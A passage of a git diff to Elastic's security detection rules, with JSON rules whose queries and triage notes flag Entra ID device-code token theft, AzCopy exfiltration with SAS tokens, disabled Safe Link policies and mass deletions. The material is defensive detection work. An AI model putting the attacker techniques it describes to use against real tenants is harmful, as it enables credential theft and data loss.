mistaken for unauthorized access. Identify and document these services, then create exceptions for known application IDs.\n- Shared devices in environments with multiple users may cause false positives if device code authentication is used regularly. Implement user-specific logging to differentiate between legitimate and suspicious activities.\n- Regular maintenance or updates by IT teams using device code authentication might be flagged. Coordinate with IT to schedule these activities and temporarily adjust monitoring rules if necessary.\n- Ensure that any exceptions or exclusions are regularly reviewed and updated to reflect changes in the environment or application usage patterns.\n\n### Response and remediation\n\n- Immediately revoke the compromised Primary Refresh Tokens (PRTs) to prevent further unauthorized access. 
This can be done through the Azure portal by navigating to the user's account and invalidating all active sessions.\n- Enforce a password reset for the affected user accounts to ensure that any credentials potentially compromised during the attack are no longer valid.\n- Implement additional Conditional Access policies that require device compliance checks and restrict access to trusted locations or devices only, to mitigate the risk of future PRT abuse.\n- Conduct a thorough review of the affected accounts' recent activity logs to identify any unauthorized actions or data access that may have occurred during the compromise.\n- Escalate the incident to the security operations team for further investigation and to determine if there are any broader implications or additional compromised accounts.\n- Enhance monitoring by configuring alerts for unusual sign-in patterns or device code authentication attempts from unexpected locations or devices, to improve early detection of similar threats.\n- Coordinate with the incident response team to perform a post-incident analysis and update the incident response plan with lessons learned from this event.", - "query": " event.dataset:(azure.activitylogs or azure.signinlogs)\n and azure.signinlogs.properties.authentication_protocol:deviceCode\n and azure.signinlogs.properties.conditional_access_audiences.application_id:29d9ed98-a469-4536-ade2-f981bc1d605e\n and event.outcome:success or (\n azure.activitylogs.properties.appId:29d9ed98-a469-4536-ade2-f981bc1d605e\n and azure.activitylogs.properties.authentication_protocol:deviceCode)\n", - "references": [ - "https://dirkjanm.io/assets/raw/Phishing%20the%20Phishing%20Resistant.pdf", - "https://learn.microsoft.com/en-us/troubleshoot/azure/entra/entra-id/governance/verify-first-party-apps-sign-in", - "https://learn.microsoft.com/en-us/azure/azure-monitor/reference/tables/signinlogs" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - }, - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.properties.appId", - "type": "unknown" - }, - { - "ecs": false, - "name": "azure.activitylogs.properties.authentication_protocol", - "type": "unknown" - }, - { - "ecs": false, - "name": "azure.signinlogs.properties.authentication_protocol", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.signinlogs.properties.conditional_access_audiences.application_id", - "type": "unknown" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "a83b3dac-325a-11ef-b3e6-f661ea17fbce", - "setup": "This rule optionally requires Azure Sign-In logs from the Azure integration. 
Ensure that the Azure integration is correctly set up and that the required data is being collected.\n", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Use Case: Identity and Access Audit", - "Tactic: Credential Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1528", - "name": "Steal Application Access Token", - "reference": "https://attack.mitre.org/techniques/T1528/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 2 - }, - "id": "a83b3dac-325a-11ef-b3e6-f661ea17fbce_2", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a8b3c4d5-e6f7-8901-a2b3-c4d5e6f78901_1.json b/packages/security_detection_engine/kibana/security_rule/a8b3c4d5-e6f7-8901-a2b3-c4d5e6f78901_1.json new file mode 100644 index 00000000000..8c7363d917b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a8b3c4d5-e6f7-8901-a2b3-c4d5e6f78901_1.json @@ -0,0 +1,108 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies successful GetBlob operations on Azure Storage Accounts using AzCopy user agent with SAS token authentication. AzCopy is a command-line utility for copying data to and from Azure Storage. While legitimate for data migration, adversaries may abuse AzCopy with compromised SAS tokens to exfiltrate data from Azure Storage Accounts. This rule detects the first occurrence of GetBlob operations from a specific storage account using this pattern.", + "false_positives": [ + "Legitimate data migration or backup operations using AzCopy with SAS tokens may trigger this rule.", + "Automated scripts or processes that use AzCopy for routine data transfers from Azure Storage Accounts.", + "DevOps or IT teams performing authorized data transfers or downloads from Azure Storage using AzCopy." + ], + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-azure.platformlogs-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Azure Storage Blob Retrieval via AzCopy", + "new_terms_fields": [ + "azure.platformlogs.properties.accountName" + ], + "note": "## Triage and analysis\n\n### Investigating Azure Storage Blob Retrieval via AzCopy\n\nAzure Storage Accounts provide cloud storage services for blobs, files, queues, and tables. Shared Access Signatures (SAS) tokens provide delegated access to resources in a storage account with specific permissions and time constraints. AzCopy is a Microsoft command-line utility designed for efficient data transfers to and from Azure Storage. While AzCopy is a legitimate tool, adversaries may abuse it with compromised SAS tokens to exfiltrate data from Azure Storage Accounts.\n\n### Possible investigation steps\n- Review the `azure.platformlogs.properties.accountName` field to identify which storage account is being accessed and assess the sensitivity of data stored in that account.\n- Examine the `azure.platformlogs.properties.objectKey` field to identify the specific blob(s) being retrieved. Determine if the accessed files contain sensitive or confidential data.\n- Check the `source.address` field to identify the source IP address of the request. 
Investigate whether this IP is unusual for the environment or originates from an unexpected network or geographic location.\n- Review the `azure.platformlogs.uri` field to examine the SAS token parameters, including:\n - `se` (expiry time): Check when the SAS token expires\n - `sp` (permissions): Verify what permissions were granted (e.g., \"rl\" for read and list)\n - `sv` (API version): Note the storage service version being used\n- Examine the `azure.platformlogs.identity.tokenHash` field to identify the specific SAS token signature being used. Correlate this with SAS token generation logs to determine when and how the token was created.\n- Check the `azure.platformlogs.properties.responseBodySize` field to assess the volume of data being downloaded. Multiple GetBlob operations with large response sizes may indicate bulk data exfiltration.\n- Search for related GetBlob operations from the same `source.address` or with the same `azure.platformlogs.identity.tokenHash` to identify patterns of systematic data retrieval.\n- Review Azure Activity Logs for recent SAS token generation events or storage account key access operations that may indicate how the adversary obtained the credentials.\n- Correlate this activity with ListBlobs or ListContainers operations from the same source, as adversaries often enumerate storage contents before exfiltration.\n- Investigate the `azure.resource.group` field to understand which resource group the storage account belongs to and check for any recent security events or configuration changes in that resource group.\n\n### False positive analysis\n- Routine data migration or backup operations using AzCopy with SAS tokens are common in enterprise environments. If this is expected behavior for the storage account, consider adding exceptions for specific accounts or IP ranges.\n- DevOps pipelines or automated workflows may use AzCopy with SAS tokens for legitimate data transfers. Review the automation configuration and add exceptions if appropriate.\n- Third-party services or partners may have authorized access to storage accounts using AzCopy and SAS tokens.
Verify these relationships and create exceptions for known authorized sources.\n\n### Response and remediation\n- If unauthorized access is confirmed, immediately revoke the compromised SAS token to prevent further data exfiltration.\n- Review and rotate any additional SAS tokens that may have been compromised through the same attack vector.\n- Assess the scope of data accessed or exfiltrated during the unauthorized GetBlob operations and determine if sensitive data was compromised.\n- Implement additional monitoring and alerting for the affected storage account to detect any further suspicious activity.\n- Review and strengthen SAS token generation policies, including implementing shorter expiration times and more restrictive permissions.\n- Consider implementing Azure Storage firewall rules or private endpoints to restrict access to storage accounts from trusted networks only.\n- Investigate how the SAS token was compromised and remediate the initial access vector to prevent future incidents.\n- Document the incident and update security procedures to prevent similar compromises in the future.\n", + "query": "event.dataset: azure.platformlogs and\n event.action: GetBlob and\n azure.platformlogs.identity.type: SAS and\n azure.platformlogs.properties.userAgentHeader: AzCopy* and\n azure.platformlogs.statusCode: 200\n", + "references": [ + "https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/", + "https://learn.microsoft.com/en-us/azure/storage/common/storage-use-azcopy-v10", + "https://learn.microsoft.com/en-us/azure/storage/common/storage-sas-overview" + ], + "related_integrations": [ + { + "integration": "platformlogs", + "package": "azure", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.platformlogs.identity.type", + "type": "unknown" + }, + { + "ecs": false, + "name": "azure.platformlogs.properties.userAgentHeader", + "type": "unknown" + }, + { + "ecs": false, + "name": "azure.platformlogs.statusCode", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a8b3c4d5-e6f7-8901-a2b3-c4d5e6f78901", + "setup": "#### Required Azure Storage Diagnostic Logs\n\nTo ensure this rule functions correctly, the following diagnostic logs must be enabled for Azure Storage Accounts:\n- StorageRead: This log captures all read operations performed on blobs in the storage account, including GetBlob operations. 
These logs should be streamed to the Event Hub used for the Azure integration configuration.\n", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Domain: Storage", + "Data Source: Azure", + "Data Source: Azure Platform Logs", + "Data Source: Azure Storage", + "Use Case: Threat Detection", + "Tactic: Exfiltration", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1567", + "name": "Exfiltration Over Web Service", + "reference": "https://attack.mitre.org/techniques/T1567/", + "subtechnique": [ + { + "id": "T1567.002", + "name": "Exfiltration to Cloud Storage", + "reference": "https://attack.mitre.org/techniques/T1567/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 1 + }, + "id": "a8b3c4d5-e6f7-8901-a2b3-c4d5e6f78901_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_207.json b/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_207.json deleted file mode 100644 index 7c9619d0e4c..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_207.json +++ /dev/null @@ -1,91 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when a Safe Link policy is disabled in Microsoft 365. Safe Link policies for Office applications extend phishing protection to documents that contain hyperlinks, even after they have been delivered to a user.", - "false_positives": [ - "Disabling safe links may be done by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Exchange Safe Link Policy Disabled", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 Exchange Safe Link Policy Disabled\n\nMicrosoft 365's Safe Link policies enhance security by scanning hyperlinks in documents for phishing threats, even post-delivery. Disabling these policies can expose users to phishing attacks. Adversaries might exploit this by disabling Safe Links to facilitate malicious link delivery. 
The detection rule identifies successful attempts to disable Safe Link policies, signaling potential security breaches.\n\n### Possible investigation steps\n\n- Review the event logs for the specific event.dataset:o365.audit and event.provider:Exchange to confirm the occurrence of the \"Disable-SafeLinksRule\" action with a successful outcome.\n- Identify the user account associated with the event.action:\"Disable-SafeLinksRule\" to determine if the action was performed by an authorized individual or if the account may have been compromised.\n- Check the recent activity of the identified user account for any unusual or unauthorized actions that could indicate a broader security incident.\n- Investigate any recent changes to Safe Link policies in the Microsoft 365 environment to understand the scope and impact of the policy being disabled.\n- Assess whether there have been any recent phishing attempts or suspicious emails delivered to users, which could exploit the disabled Safe Link policy.\n- Coordinate with the IT security team to re-enable the Safe Link policy and implement additional monitoring to prevent future unauthorized changes.\n\n### False positive analysis\n\n- Administrative changes: Legitimate administrative actions may involve disabling Safe Link policies temporarily for testing or configuration purposes. To manage this, create exceptions for known administrative accounts or scheduled maintenance windows.\n- Third-party integrations: Some third-party security tools or integrations might require Safe Link policies to be disabled for compatibility reasons. Identify and document these tools, and set up exceptions for their associated actions.\n- Policy updates: During policy updates or migrations, Safe Link policies might be disabled as part of the process. Monitor and document these events, and exclude them from alerts if they match known update patterns.\n- User training sessions: Safe Link policies might be disabled during user training or demonstrations to showcase potential threats. 
Schedule these sessions and exclude related activities from triggering alerts.\n\n### Response and remediation\n\n- Immediately re-enable the Safe Link policy in Microsoft 365 to restore phishing protection for hyperlinks in documents.\n- Conduct a thorough review of recent email and document deliveries to identify any potentially malicious links that may have been delivered while the Safe Link policy was disabled.\n- Isolate any identified malicious links or documents and notify affected users to prevent interaction with these threats.\n- Investigate the account or process that disabled the Safe Link policy to determine if it was compromised or misused, and take appropriate actions such as password resets or privilege revocation.\n- Escalate the incident to the security operations team for further analysis and to determine if additional security measures are needed to prevent similar incidents.\n- Implement additional monitoring and alerting for changes to Safe Link policies to ensure rapid detection of any future unauthorized modifications.\n- Review and update access controls and permissions related to Safe Link policy management to ensure only authorized personnel can make changes.", - "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Disable-SafeLinksRule\" and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-safelinksrule?view=exchange-ps", - "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/atp-safe-links?view=o365-worldwide" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Identity and Access Audit", - "Tactic: Initial Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1566", - "name": "Phishing", - "reference": "https://attack.mitre.org/techniques/T1566/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ab8f074c-5565-4bc4-991c-d49770e19fc9_6.json b/packages/security_detection_engine/kibana/security_rule/ab8f074c-5565-4bc4-991c-d49770e19fc9_6.json index 246bee4530a..63263e87086 100644 --- a/packages/security_detection_engine/kibana/security_rule/ab8f074c-5565-4bc4-991c-d49770e19fc9_6.json +++ b/packages/security_detection_engine/kibana/security_rule/ab8f074c-5565-4bc4-991c-d49770e19fc9_6.json @@ -19,6 +19,13 @@ 
"https://www.gem.security/post/cloud-ransomware-a-new-take-on-an-old-attack-pattern/", "https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], "risk_score": 47, "rule_id": "ab8f074c-5565-4bc4-991c-d49770e19fc9", "setup": "AWS S3 data event types need to be enabled in the CloudTrail trail configuration.", diff --git a/packages/security_detection_engine/kibana/security_rule/af22d970-7106-45b4-b5e3-460d15333727_3.json b/packages/security_detection_engine/kibana/security_rule/af22d970-7106-45b4-b5e3-460d15333727_3.json deleted file mode 100644 index bfa68af6e1f..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/af22d970-7106-45b4-b5e3-460d15333727_3.json +++ /dev/null @@ -1,102 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic", - "Matteo Potito Giorgio" - ], - "description": "Identifies when a user is observed for the first time in the last 14 days authenticating using the device code authentication workflow. This authentication workflow can be abused by attackers to phish users and steal access tokens to impersonate the victim. By its very nature, device code should only be used when logging in to devices without keyboards, where it is difficult to enter emails and passwords.", - "from": "now-9m", - "history_window_start": "now-14d", - "index": [ - "filebeat-*", - "logs-azure.signinlogs-*", - "logs-azure.activitylogs-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "First Occurrence of Entra ID Auth via DeviceCode Protocol", - "new_terms_fields": [ - "azure.signinlogs.properties.user_principal_name" - ], - "note": "## Triage and analysis\n\n## Triage and Analysis\n\n### Investigating First Occurrence of Entra ID Auth via DeviceCode Protocol\n\nThis rule detects the first instance of a user authenticating via the **DeviceCode** authentication protocol within a **14-day window**. The **DeviceCode** authentication workflow is designed for devices that lack keyboards, such as IoT devices and smart TVs. 
However, adversaries can abuse this mechanism by phishing users and stealing authentication tokens, leading to unauthorized access.\n\n### Possible Investigation Steps\n\n#### Identify the User and Authentication Details\n- **User Principal Name (UPN)**: Review `azure.signinlogs.properties.user_principal_name` to identify the user involved in the authentication event.\n- **User ID**: Check `azure.signinlogs.properties.user_id` for a unique identifier of the affected account.\n- **Authentication Protocol**: Confirm that `azure.signinlogs.properties.authentication_protocol` is set to `deviceCode`.\n- **Application Used**: Verify the application through `azure.signinlogs.properties.app_display_name` and `azure.signinlogs.properties.app_id` to determine if it is an expected application.\n\n#### Review the Source IP and Geolocation\n- **Source IP Address**: Check `source.ip` and compare it with previous authentication logs to determine whether the login originated from a trusted or expected location.\n- **Geolocation Details**: Analyze `source.geo.city_name`, `source.geo.region_name`, and `source.geo.country_name` to confirm whether the login location is suspicious.\n- **ASN / ISP Details**: Review `source.as.organization.name` to check if the IP is associated with a known organization or cloud provider.\n\n#### Examine Multi-Factor Authentication (MFA) and Conditional Access\n- **MFA Enforcement**: Review `azure.signinlogs.properties.applied_conditional_access_policies` to determine if MFA was enforced during the authentication.\n- **Conditional Access Policies**: Check `azure.signinlogs.properties.conditional_access_status` to understand if conditional access policies were applied and if any controls were bypassed.\n- **Authentication Method**: Look at `azure.signinlogs.properties.authentication_details` to confirm how authentication was satisfied (e.g., MFA via claim in token).\n\n#### Validate Device and Client Details\n- **Device Information**: Review `azure.signinlogs.properties.device_detail.browser` to determine if the login aligns with the expected behavior of a device that lacks a keyboard.\n- **User-Agent Analysis**: Inspect `user_agent.original` for anomalies, such as an unexpected operating system or browser.\n- **Client Application**: Verify `azure.signinlogs.properties.client_app_used` to confirm whether the login was performed using a known client.\n\n#### Investigate Related Activities\n- **Correlate with Phishing Attempts**: Check if the user recently reported phishing attempts or suspicious emails.\n- **Monitor for Anomalous Account Activity**: Look for recent changes in the user's account settings, including password resets, role changes, or delegation of access.\n- **Check for Additional DeviceCode Logins**: Review if other users in the environment have triggered similar authentication events within the same timeframe.\n\n## False Positive Analysis\n\n- **Legitimate Device Enrollment**: If the user is setting up a new device (e.g., a smart TV or kiosk), this authentication may be expected.\n- **Automation or Scripting**: Some legitimate applications or scripts may leverage the `DeviceCode` authentication protocol for non-interactive logins.\n- **Shared Devices in Organizations**: In cases where shared workstations or conference room devices are in use, legitimate users may trigger alerts.\n- **Travel and Remote Work**: If the user is traveling or accessing from a new location, confirm legitimacy before taking action.\n\n## Response and Remediation\n\n- **Revoke Suspicious 
Access Tokens**: Immediately revoke any access tokens associated with this authentication event.\n- **Investigate the User\u2019s Recent Activity**: Review additional authentication logs, application access, and recent permission changes for signs of compromise.\n- **Reset Credentials and Enforce Stronger Authentication**:\n - Reset the affected user\u2019s credentials.\n - Enforce stricter MFA policies for sensitive accounts.\n - Restrict `DeviceCode` authentication to only required applications.\n- **Monitor for Further Anomalies**:\n - Enable additional logging and anomaly detection for DeviceCode logins.\n - Set up alerts for unauthorized access attempts using this authentication method.\n- **Educate Users on Phishing Risks**: If phishing is suspected, notify the affected user and provide security awareness training on how to recognize and report phishing attempts.\n- **Review and Adjust Conditional Access Policies**:\n - Limit `DeviceCode` authentication to approved users and applications.\n - Implement stricter geolocation-based authentication restrictions.\n", - "query": "event.dataset:(azure.activitylogs or azure.signinlogs)\n and (\n azure.signinlogs.properties.authentication_protocol:deviceCode or\n azure.signinlogs.properties.original_transfer_method: \"Device code flow\" or\n azure.activitylogs.properties.authentication_protocol:deviceCode\n )\n and event.outcome:success\n", - "references": [ - "https://aadinternals.com/post/phishing/", - "https://www.blackhillsinfosec.com/dynamic-device-code-phishing/", - "https://www.volexity.com/blog/2025/02/13/multiple-russian-threat-actors-targeting-microsoft-device-code-authentication/", - "https://learn.microsoft.com/en-us/entra/identity/conditional-access/concept-authentication-flows" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - }, - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.properties.authentication_protocol", - "type": "unknown" - }, - { - "ecs": false, - "name": "azure.signinlogs.properties.authentication_protocol", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.signinlogs.properties.original_transfer_method", - "type": "unknown" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "af22d970-7106-45b4-b5e3-460d15333727", - "setup": "This rule optionally requires Azure Sign-In logs from the Azure integration. 
Ensure that the Azure integration is correctly set up and that the required data is being collected.\n", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Use Case: Identity and Access Audit", - "Tactic: Credential Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1528", - "name": "Steal Application Access Token", - "reference": "https://attack.mitre.org/techniques/T1528/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 3 - }, - "id": "af22d970-7106-45b4-b5e3-460d15333727_3", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_207.json b/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_207.json deleted file mode 100644 index eed020f573e..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_207.json +++ /dev/null @@ -1,91 +0,0 @@ -{ - "attributes": { - "author": [ - "Austin Songer" - ], - "description": "Identifies that a user has deleted an unusually large volume of files as reported by Microsoft Cloud App Security.", - "false_positives": [ - "Users or System Administrator cleaning out folders." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Unusual Volume of File Deletion", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 Unusual Volume of File Deletion\n\nMicrosoft 365's cloud environment facilitates file storage and collaboration, but its vast data handling capabilities can be exploited by adversaries for data destruction. Attackers may delete large volumes of files to disrupt operations or cover their tracks. 
The detection rule leverages audit logs to identify anomalies in file deletion activities, flagging successful, unusual deletion volumes as potential security incidents, thus enabling timely investigation and response.\n\n### Possible investigation steps\n\n- Review the audit logs for the specific user associated with the alert to confirm the volume and context of the file deletions, focusing on entries with event.action:\"Unusual volume of file deletion\" and event.outcome:success.\n- Correlate the timestamps of the deletion events with other activities in the user's account to identify any suspicious patterns or anomalies, such as unusual login locations or times.\n- Check for any recent changes in user permissions or roles that might explain the ability to delete a large volume of files, ensuring these align with the user's typical responsibilities.\n- Investigate any recent security alerts or incidents involving the same user or related accounts to determine if this activity is part of a broader attack or compromise.\n- Contact the user or their manager to verify if the deletions were intentional and authorized, and gather any additional context that might explain the activity.\n- Assess the impact of the deletions on business operations and data integrity, and determine if any recovery actions are necessary to restore critical files.\n\n### False positive analysis\n\n- High-volume legitimate deletions during data migration or cleanup projects can trigger false positives. To manage this, create exceptions for users or groups involved in these activities during the specified time frame.\n- Automated processes or scripts that perform bulk deletions as part of routine maintenance may be flagged. Identify these processes and whitelist them to prevent unnecessary alerts.\n- Users with roles in data management or IT support may regularly delete large volumes of files as part of their job responsibilities. Establish a baseline for these users and adjust the detection thresholds accordingly.\n- Temporary spikes in file deletions due to organizational changes, such as department restructuring, can be mistaken for malicious activity. Monitor these events and temporarily adjust the rule parameters to accommodate expected changes.\n- Regularly review and update the list of exceptions to ensure that only legitimate activities are excluded from alerts, maintaining the effectiveness of the detection rule.\n\n### Response and remediation\n\n- Immediately isolate the affected user account to prevent further unauthorized file deletions. This can be done by disabling the account or changing the password.\n- Review the audit logs to identify the scope of the deletion and determine if any critical or sensitive files were affected. 
Restore these files from backups if available.\n- Conduct a thorough review of the affected user's recent activities to identify any other suspicious actions or potential indicators of compromise.\n- Escalate the incident to the security operations team for further investigation and to determine if the deletion is part of a larger attack or breach.\n- Implement additional monitoring on the affected account and similar high-risk accounts to detect any further unusual activities.\n- Review and update access controls and permissions to ensure that users have the minimum necessary access to perform their job functions, reducing the risk of large-scale deletions.\n- Coordinate with the IT and security teams to conduct a post-incident review, identifying any gaps in the response process and implementing improvements to prevent recurrence.", - "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:\"Unusual volume of file deletion\" and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "b2951150-658f-4a60-832f-a00d1e6c6745", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Configuration Audit", - "Tactic: Impact", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0040", - "name": "Impact", - "reference": "https://attack.mitre.org/tactics/TA0040/" - }, - "technique": [ - { - "id": "T1485", - "name": "Data Destruction", - "reference": "https://attack.mitre.org/techniques/T1485/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "b2951150-658f-4a60-832f-a00d1e6c6745_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b2c3d4e5-6f7a-8b9c-0d1e-2f3a4b5c6d7e_1.json b/packages/security_detection_engine/kibana/security_rule/b2c3d4e5-6f7a-8b9c-0d1e-2f3a4b5c6d7e_1.json new file mode 100644 index 00000000000..3835157fde5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b2c3d4e5-6f7a-8b9c-0d1e-2f3a4b5c6d7e_1.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a single user or service principal deletes multiple Azure Storage Accounts within a short time period. This behavior may indicate an adversary attempting to cause widespread service disruption, destroy evidence, or execute a destructive attack such as ransomware. 
Mass deletion of storage accounts can have severe business impact and is rarely performed by legitimate administrators except during controlled decommissioning activities.", + "false_positives": [ + "Infrastructure teams may legitimately delete multiple storage accounts during planned decommissioning, resource cleanup, or large-scale infrastructure optimization. Verify that the deletion activity was expected and follows organizational change management processes. Consider exceptions for approved maintenance windows or automation service principals." + ], + "from": "now-9m", + "index": [ + "logs-azure.activitylogs-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Azure Storage Account Deletions by User", + "note": "## Triage and analysis\n\n### Investigating Azure Storage Account Deletions by User\n\nAzure Storage Accounts are critical infrastructure components that store application data, backups, and business-critical information. Mass deletion of storage accounts is an unusual and high-impact activity that can result in significant data loss and service disruption. Adversaries may perform bulk deletions to destroy evidence after data exfiltration, cause denial of service, or as part of ransomware campaigns targeting cloud infrastructure. This detection identifies when a single identity deletes multiple storage accounts in a short timeframe, which is indicative of potentially malicious activity.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to identify the user or service principal that initiated the multiple storage account deletions by examining the principal ID, UPN and user agent fields in `azure.activitylogs.identity.claims_initiated_by_user.name`.\n- Check the specific storage account names in `azure.resource.name` to understand which storage resources were deleted and assess the overall business impact.\n- Investigate the timing and sequence of deletions to determine if they followed a pattern consistent with automated malicious activity or manual destruction.\n- Examine the user's recent activity history including authentication events, privilege changes, and other Azure resource modifications to identify signs of account compromise.\n- Verify if the storage account deletions align with approved change requests, maintenance windows, or decommissioning activities in your organization.\n- Check if the deleted storage accounts contained critical data and whether backups are available for recovery.\n- Review any related alerts or activities such as data exfiltration, unusual authentication patterns, or privilege escalation that occurred before the deletions.\n- Investigate if other Azure resources (VMs, databases, resource groups) were also deleted or modified by the same principal.\n- Check the authentication source and location to identify if the activity originated from an expected network location or potentially compromised session.\n\n### False positive analysis\n\n- Legitimate bulk decommissioning of storage accounts during 